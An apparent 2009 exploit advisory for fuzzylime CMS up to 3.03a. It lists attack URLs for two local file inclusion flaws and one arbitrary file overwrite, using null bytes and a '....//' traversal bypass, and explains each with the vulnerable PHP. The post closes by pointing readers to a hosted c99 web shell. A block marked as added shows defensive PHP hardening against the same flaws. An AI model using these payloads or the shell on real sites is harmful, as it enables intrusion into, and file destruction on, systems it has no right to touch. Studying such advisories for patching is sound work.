
From:ceza_fuat_kolik_(at)_hotmail.com <ceza_fuat_kolik_(at)_hotmail.com>
Date:22.06.2009
Subject:fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC

+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker |
+-----------+---------------------+
Author :  xhaxkerx
Special Thankz : yasin
site : http://www.c99.mobi
+---------------------------------+    


[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion mq=off)
-----------------------------------------------------------------
1. <?
2. @extract($HTTP_GET_VARS);  <-------- {1}
3. @extract($_GET);           <----------^
     
27.  elseif(isset($e)) { <------- {2}
28.       $filename = "code/mailing/$list.inc.php"; <------- {3}
29.        @include $filename; <------- {4}
-----------------------------------------------------------------
1. extract() allows overwriting any undefined variable via GET,
   therefore it works regardless of the register_globals setting.

2. $e is a variable that is not defined, therefore it becomes $_GET['e']
3. $list is a variable that is not defined, therefore it becomes $_GET['list']
4. $filename contains the $list variable that will be included
-----------------------------------------------------------------


[2][LFI]

http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion mq=0 & reg=on)
--------------------------------------------------------------------
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
--------------------------------------------------------------------




[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)

Vulnerable code: display.php (local file corruption register_gl=1)
-----------------------------------------------------------------
 1. <?
 2. $s = $_GET[s];
 3. $p = $_GET[p];
 4. $s = str_replace("../", "", $s); <---------- {1}
 5. $p = str_replace("../", "", $p);
...
54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2}
100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3}
101.            if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
102.                    $output = ob_get_contents();
103.                    fputs($handle, $output);
104.
105.                    fclose($handle);
106.            }
107.    }
----------------------------------------------------------------------
1. you have to use ....// to change directory because of the 1st point, so
   ....// will become ../
2. $cachefile contains the $s variable
3. if $usecache == 1 we go ahead
4. you will overwrite a file by supplying its name via the $s variable.
-----------------------------------------------------------------------  
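As an added example (not part of the original post and not fuzzylime's own code), the following PHP closes the three patterns above from the application side: request data is never extract()ed into local variables, the file to include is chosen from a fixed allow-list or a strictly validated name, and the cache path is checked with realpath() instead of a single str_replace("../", ""), which a doubled sequence survives as point 1 of [3] notes. The function names, the allow-list contents and the directory layout are assumptions made for this example.

```php
<?php
// Added hardening example (not fuzzylime code). Assumed layout:
// code/mailing/<list>.inc.php, templates/<name>_f.php and cache/ under APP_ROOT.
define('APP_ROOT', __DIR__);

// Validate a single path segment: letters, digits, underscore and hyphen only.
// Rejects "/", "\", "." and NUL, so "../", "....//" and a null byte never
// reach the filesystem layer at all.
function safe_segment(string $value): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $value) === 1 ? $value : null;
}

// Resolve $relative under $base and confirm the result stays inside $base.
// realpath() canonicalises ".." and symlinks, so no textual filtering is needed.
function path_under(string $base, string $relative): ?string
{
    $baseReal  = realpath($base);
    $candidate = realpath($base . '/' . $relative);
    if ($baseReal === false || $candidate === false) {
        return null;  // missing file or directory: refuse rather than guess
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// [1] confirm.php: do not extract() request data; pick $list from an allow-list.
function mailing_include_path(array $get): ?string
{
    $allowed = ['newsletter', 'unsubscribe'];  // assumed list names
    $list = $get['list'] ?? '';
    if (!in_array($list, $allowed, true)) {
        return null;
    }
    return path_under(APP_ROOT . '/code/mailing', $list . '.inc.php');
}

// [2] display.php: validate the template name, then include only a checked path.
function template_include_path(array $get): ?string
{
    $template = safe_segment($get['template'] ?? '');
    if ($template === null) {
        return null;
    }
    return path_under(APP_ROOT . '/templates', $template . '_f.php');
}

// [3] display.php cache writer: build the cache name from validated segments only,
// so $s can no longer steer fopen(..., 'w') outside the cache directory.
function cache_file_path(array $get): ?string
{
    $parts = [];
    foreach (['s', 'p', 'm', 'c', 't', 'u', 'print'] as $key) {
        $seg = safe_segment($get[$key] ?? '0');
        if ($seg === null) {
            return null;  // any bad segment aborts caching instead of writing elsewhere
        }
        $parts[] = $seg;
    }
    // The cache file may not exist yet, so the containment check is done on
    // the directory and the validated file name is appended afterwards.
    $dir = path_under(APP_ROOT, 'cache');
    if ($dir === null) {
        return null;
    }
    return $dir . DIRECTORY_SEPARATOR . implode('_', $parts) . '.cache.htm';
}

// Usage: each function returns either a path that is known to lie inside the
// expected directory or null, and the caller includes/writes only on non-null.
$path = template_include_path($_GET);
if ($path !== null) {
    include $path;
}
```

The two checks are deliberately layered: safe_segment() rejects anything that is not a plain name before any path is built, and path_under() confirms, after canonicalisation, that the final path is still below the intended directory. Either one alone would have been enough for the inputs shown in this advisory; together they also cover encodings or symlinks that a pattern-based filter does not anticipate.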
if you need shell http://www.c99.mobi/c99.txt


[x] http://www.youtube.com/watch?v=h3DQmJOkSY0
